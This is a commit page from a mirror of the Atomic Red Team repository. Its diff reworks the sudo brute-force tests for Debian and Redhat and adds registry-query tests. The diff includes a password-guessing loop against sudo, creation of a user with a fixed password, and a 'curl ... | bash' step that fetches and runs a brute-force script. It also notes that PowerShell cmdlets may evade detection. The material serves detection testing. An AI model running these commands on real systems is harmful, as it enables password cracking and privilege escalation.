security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'master' into T1033-Cleanup-Fix

Browse Source
This commit is contained in:
Paul
2023-03-17 15:57:18 -04:00
committed by GitHub
parent 9c6e2bae53 8e27dbe2b1
commit db6e360cc3
14 changed files with 420 additions and 323 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/index.csv
+3 -3
View File
@@ -1030,9 +1030,9 @@ credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,ae
credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.001,Brute Force: Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
1030 credential-access T1110.001 Brute Force: Password Guessing 1 Brute Force Credentials of single Active Directory domain users via SMB 09480053-2f98-4854-be6e-71ae5f672224 command_prompt
1031 credential-access T1110.001 Brute Force: Password Guessing 2 Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) c2969434-672b-4ec8-8df0-bbb91f40e250 powershell
1032 credential-access T1110.001 Brute Force: Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
1033 credential-access T1110.001 Brute Force: Password Guessing 4 SUDO brute force Debian Password Brute User using Kerbrute Tool 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 sh powershell
1034 credential-access T1110.001 Brute Force: Password Guessing 5 SUDO brute force Redhat SUDO Brute Force - Debian b72958a7-53e3-4809-9ee1-58f6ecd99ade ba1bf0b6-f32b-4db0-b7cc-d78cacc76700 sh bash
1035 credential-access T1110.001 Brute Force: Password Guessing 6 Password Brute User using Kerbrute Tool SUDO Brute Force - Redhat 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 4097bc00-5eeb-4d56-aaf9-287d60351d95 powershell bash
1036 credential-access T1003 OS Credential Dumping 1 Gsecdump 96345bfc-8ae7-4b6a-80b7-223200f24ef9 command_prompt
1037 credential-access T1003 OS Credential Dumping 2 Credential Dumping with NPPSpy 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 powershell
1038 credential-access T1003 OS Credential Dumping 3 Dump svchost.exe to gather RDP credentials d400090a-d8ca-4be0-982e-c70598a23de9 powershell
atomics/Indexes/Indexes-CSV/linux-index.csv
+2 -2
View File
@@ -173,8 +173,8 @@ credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to
credential-access,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
credential-access,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
credential-access,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
credential-access,T1110.001,Brute Force: Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
173 credential-access T1056.001 Input Capture: Keylogging 4 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 sh
174 credential-access T1056.001 Input Capture: Keylogging 5 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
175 credential-access T1056.001 Input Capture: Keylogging 6 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
176 credential-access T1110.001 Brute Force: Password Guessing 4 5 SUDO brute force Debian SUDO Brute Force - Debian 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a ba1bf0b6-f32b-4db0-b7cc-d78cacc76700 sh bash
177 credential-access T1110.001 Brute Force: Password Guessing 5 6 SUDO brute force Redhat SUDO Brute Force - Redhat b72958a7-53e3-4809-9ee1-58f6ecd99ade 4097bc00-5eeb-4d56-aaf9-287d60351d95 sh bash
178 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 1 Dump individual process memory with sh (Local) 7e91138a-8e74-456d-a007-973d67a0bb80 sh
179 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 2 Dump individual process memory with Python (Local) 437b2003-a20d-4ed8-834c-4964f24eec63 sh
180 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 3 Capture Passwords with MimiPenguin a27418de-bdce-4ebd-b655-38f04842bf0c bash
atomics/Indexes/Indexes-CSV/windows-index.csv
+1 -1
View File
@@ -719,7 +719,7 @@ lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,3,Changing R
credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
719 credential-access T1056.001 Input Capture: Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
720 credential-access T1110.001 Brute Force: Password Guessing 1 Brute Force Credentials of single Active Directory domain users via SMB 09480053-2f98-4854-be6e-71ae5f672224 command_prompt
721 credential-access T1110.001 Brute Force: Password Guessing 2 Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) c2969434-672b-4ec8-8df0-bbb91f40e250 powershell
722 credential-access T1110.001 Brute Force: Password Guessing 6 4 Password Brute User using Kerbrute Tool 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 powershell
723 credential-access T1003 OS Credential Dumping 1 Gsecdump 96345bfc-8ae7-4b6a-80b7-223200f24ef9 command_prompt
724 credential-access T1003 OS Credential Dumping 2 Credential Dumping with NPPSpy 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 powershell
725 credential-access T1003 OS Credential Dumping 3 Dump svchost.exe to gather RDP credentials d400090a-d8ca-4be0-982e-c70598a23de9 powershell
atomics/Indexes/Indexes-Markdown/index.md
+3 -3
View File
@@ -1676,9 +1676,9 @@
- Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
- Atomic Test #4: SUDO brute force Debian [linux]
- Atomic Test #5: SUDO brute force Redhat [linux]
- Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
- Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
- Atomic Test #5: SUDO Brute Force - Debian [linux]
- Atomic Test #6: SUDO Brute Force - Redhat [linux]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
atomics/Indexes/Indexes-Markdown/linux-index.md
+2 -2
View File
@@ -392,8 +392,8 @@
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #4: SUDO brute force Debian [linux]
- Atomic Test #5: SUDO brute force Redhat [linux]
- Atomic Test #5: SUDO Brute Force - Debian [linux]
- Atomic Test #6: SUDO Brute Force - Redhat [linux]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
atomics/Indexes/Indexes-Markdown/windows-index.md
+1 -1
View File
@@ -1195,7 +1195,7 @@
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows]
- Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #6: Password Brute User using Kerbrute Tool [windows]
- Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
- Atomic Test #1: Gsecdump [windows]
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
atomics/Indexes/index.yaml
+86 -75
View File
@@ -74960,81 +74960,6 @@ credential-access:
}
}
Write-Host "End of bruteforce"
- name: SUDO brute force Debian
auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
description: |
Attempts to sudo with current user using passwords from a list. Will run sudo 3 times, each with 3 different password attempts.
PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if running on a Debian based machine.
'
prereq_command: |
if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
get_prereq_command: 'apt-get update && apt-get install -y sudo
'
executor:
elevation_required: false
command: |
for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
echo done
cleanup_command: 'rm -f /tmp/asker /tmp/workingfile
'
name: sh
- name: SUDO brute force Redhat
auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade
description: "Brute force the password of a local user account which is a member
of the sudo'ers group on a Redhat based Linux distribution. \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if running on a Redhat based machine.
'
prereq_command: |
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
get_prereq_command: 'yum -y update && yum install -y openssl sudo
'
executor:
elevation_required: true
command: |
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
su target
PASSWORDS=(one two three password five); \
touch /tmp/file; \
for P in ${PASSWORDS[@]}; do \
date +"%b %d %T"; \
sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
echo "exit: $?"; \
if grep -q "root" /tmp/file; then \
echo "FOUND: sudo => $P"; break; \
else \
echo "TRIED: $P"; \
fi; \
sleep 2; \
done; \
rm /tmp/file
cleanup_command: 'userdel target
'
name: sh
- name: Password Brute User using Kerbrute Tool
auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4
description: 'Bruteforce a single user''s password from a wordlist
@@ -75080,6 +75005,92 @@ credential-access:
elevation_required: false
command: "cd $env:temp\n.\\kerbrute.exe bruteuser --dc #{domaincontroller}
-d #{domain} $env:temp\\bruteuser.txt TestUser1 \n"
- name: SUDO Brute Force - Debian
auto_generated_guid: ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
description: "An adversary may find themselves on a box (e.g. via ssh key auth,
with no password) with a user that has sudo'ers privileges, but they do not
know the users password. Normally, failed attempts to access root will not
cause the root account to become locked, to prevent denial-of-service. This
functionality enables an attacker to undertake a local brute force password
guessing attack without locking out the root user. \n\nThis test creates the
\"art\" user with a password of \"password123\", logs in, downloads and executes
the sudo_bruteforce.sh which brute force guesses the password, then deletes
the user\n"
supported_platforms:
- linux
input_arguments:
remote_url:
description: url of remote payload
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
dependency_executor_name: bash
dependencies:
- description: 'Check if running on a Debian based machine.
'
prereq_command: |
if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
get_prereq_command: 'apt update && apt install -y openssl sudo curl
'
executor:
name: bash
elevation_required: true
command: |
useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s #{remote_url} |bash
cleanup_command: 'userdel -fr art
'
- name: SUDO Brute Force - Redhat
auto_generated_guid: 4097bc00-5eeb-4d56-aaf9-287d60351d95
description: "An adversary may find themselves on a box (e.g. via ssh key auth,
with no password) with a user that has sudo'ers privileges, but they do not
know the users password. Normally, failed attempts to access root will not
cause the root account to become locked, to prevent denial-of-service. This
functionality enables an attacker to undertake a local brute force password
guessing attack without locking out the root user. \n\nThis test creates the
\"art\" user with a password of \"password123\", logs in, downloads and executes
the sudo_bruteforce.sh which brute force guesses the password, then deletes
the user\n"
supported_platforms:
- linux
input_arguments:
remote_url:
description: url of remote payload
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
dependency_executor_name: bash
dependencies:
- description: 'Check if running on a Redhat based machine.
'
prereq_command: |
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
get_prereq_command: 'yum update && yum install -y openssl sudo curl
'
executor:
name: bash
elevation_required: true
command: |
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s #{remote_url} |bash
cleanup_command: 'userdel -fr art
'
T1003:
technique:
x_mitre_platforms:
atomics/Indexes/linux-index.yaml
+57 -46
View File
@@ -50793,81 +50793,92 @@ credential-access:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1110.001
atomic_tests:
- name: SUDO brute force Debian
auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
description: |
Attempts to sudo with current user using passwords from a list. Will run sudo 3 times, each with 3 different password attempts.
PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
- name: SUDO Brute Force - Debian
auto_generated_guid: ba1bf0b6-f32b-4db0-b7cc-d78cacc76700
description: "An adversary may find themselves on a box (e.g. via ssh key auth,
with no password) with a user that has sudo'ers privileges, but they do not
know the users password. Normally, failed attempts to access root will not
cause the root account to become locked, to prevent denial-of-service. This
functionality enables an attacker to undertake a local brute force password
guessing attack without locking out the root user. \n\nThis test creates the
\"art\" user with a password of \"password123\", logs in, downloads and executes
the sudo_bruteforce.sh which brute force guesses the password, then deletes
the user\n"
supported_platforms:
- linux
dependency_executor_name: sh
input_arguments:
remote_url:
description: url of remote payload
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
dependency_executor_name: bash
dependencies:
- description: 'Check if running on a Debian based machine.
'
prereq_command: |
if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
get_prereq_command: 'apt-get update && apt-get install -y sudo
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
get_prereq_command: 'apt update && apt install -y openssl sudo curl
'
executor:
elevation_required: false
name: bash
elevation_required: true
command: |
for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
echo done
cleanup_command: 'rm -f /tmp/asker /tmp/workingfile
useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s #{remote_url} |bash
cleanup_command: 'userdel -fr art
'
name: sh
- name: SUDO brute force Redhat
auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade
description: "Brute force the password of a local user account which is a member
of the sudo'ers group on a Redhat based Linux distribution. \n"
- name: SUDO Brute Force - Redhat
auto_generated_guid: 4097bc00-5eeb-4d56-aaf9-287d60351d95
description: "An adversary may find themselves on a box (e.g. via ssh key auth,
with no password) with a user that has sudo'ers privileges, but they do not
know the users password. Normally, failed attempts to access root will not
cause the root account to become locked, to prevent denial-of-service. This
functionality enables an attacker to undertake a local brute force password
guessing attack without locking out the root user. \n\nThis test creates the
\"art\" user with a password of \"password123\", logs in, downloads and executes
the sudo_bruteforce.sh which brute force guesses the password, then deletes
the user\n"
supported_platforms:
- linux
dependency_executor_name: sh
input_arguments:
remote_url:
description: url of remote payload
type: Url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
dependency_executor_name: bash
dependencies:
- description: 'Check if running on a Redhat based machine.
'
prereq_command: |
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
get_prereq_command: 'yum -y update && yum install -y openssl sudo
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
get_prereq_command: 'yum update && yum install -y openssl sudo curl
'
executor:
name: bash
elevation_required: true
command: |
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
su target
PASSWORDS=(one two three password five); \
touch /tmp/file; \
for P in ${PASSWORDS[@]}; do \
date +"%b %d %T"; \
sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
echo "exit: $?"; \
if grep -q "root" /tmp/file; then \
echo "FOUND: sudo => $P"; break; \
else \
echo "TRIED: $P"; \
fi; \
sleep 2; \
done; \
rm /tmp/file
cleanup_command: 'userdel target
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s #{remote_url} |bash
cleanup_command: 'userdel -fr art
'
name: sh
T1003:
technique:
x_mitre_platforms:
atomics/T1012/T1012.yaml
+36
View File
@@ -34,8 +34,44 @@ atomic_tests:
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
name: command_prompt
elevation_required: true
- name: Query Registry with Powershell cmdlets
description: |
Query Windows Registry with Powershell cmdlets, i.e., Get-Item and Get-ChildItem. The results from above can also be achieved with Get-Item and Get-ChildItem.
Unlike using "reg query" which then executes reg.exe, using cmdlets won't generate new processes, which may evade detection systems monitoring process generation.
supported_platforms:
- windows
executor:
command: |
Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\" | findstr Windows
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunServices"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunServices"
Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
Get-Item -Path "HKCU:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
Get-Item -Path "HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
Get-Item -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnce"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\RunOnceEx"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Run"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\RunOnce"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
Get-Item -Path "HKCU:Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
Get-ChildItem -Path "HKLM:system\currentcontrolset\services"
Get-Item -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Run"
Get-Item -Path "HKLM:SYSTEM\CurrentControlSet\Control\SafeBoot"
Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Active Setup\Installed Components"
Get-ChildItem -Path "HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
name: powershell
elevation_required: true
- name: Enumerate COM Objects in Registry with Powershell
auto_generated_guid: 0d80d088-a84c-4353-af1a-fc8b439f1564
description: |-
atomics/T1110.001/T1110.001.md
+120 -119
View File
@@ -32,11 +32,11 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
- [Atomic Test #3 - Brute Force Credentials of single Azure AD user](#atomic-test-3---brute-force-credentials-of-single-azure-ad-user)
- [Atomic Test #4 - SUDO brute force Debian](#atomic-test-4---sudo-brute-force-debian)
- [Atomic Test #4 - Password Brute User using Kerbrute Tool](#atomic-test-4---password-brute-user-using-kerbrute-tool)
- [Atomic Test #5 - SUDO brute force Redhat](#atomic-test-5---sudo-brute-force-redhat)
- [Atomic Test #5 - SUDO Brute Force - Debian](#atomic-test-5---sudo-brute-force---debian)
- [Atomic Test #6 - Password Brute User using Kerbrute Tool](#atomic-test-6---password-brute-user-using-kerbrute-tool)
- [Atomic Test #6 - SUDO Brute Force - Redhat](#atomic-test-6---sudo-brute-force---redhat)
<br/>
@@ -198,122 +198,7 @@ Install-Module -Name AzureAD -Force
<br/>
<br/>
## Atomic Test #4 - SUDO brute force Debian
Attempts to sudo with current user using passwords from a list. Will run sudo 3 times, each with 3 different password attempts.
PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
**Supported Platforms:** Linux
**auto_generated_guid:** 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
#### Attack Commands: Run with `sh`!
```sh
for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
echo done
```
#### Cleanup Commands:
```sh
rm -f /tmp/asker /tmp/workingfile
```
#### Dependencies: Run with `sh`!
##### Description: Check if running on a Debian based machine.
##### Check Prereq Commands:
```sh
if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
```
##### Get Prereq Commands:
```sh
apt-get update && apt-get install -y sudo
```
<br/>
<br/>
## Atomic Test #5 - SUDO brute force Redhat
Brute force the password of a local user account which is a member of the sudo'ers group on a Redhat based Linux distribution.
**Supported Platforms:** Linux
**auto_generated_guid:** b72958a7-53e3-4809-9ee1-58f6ecd99ade
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
su target
PASSWORDS=(one two three password five); \
touch /tmp/file; \
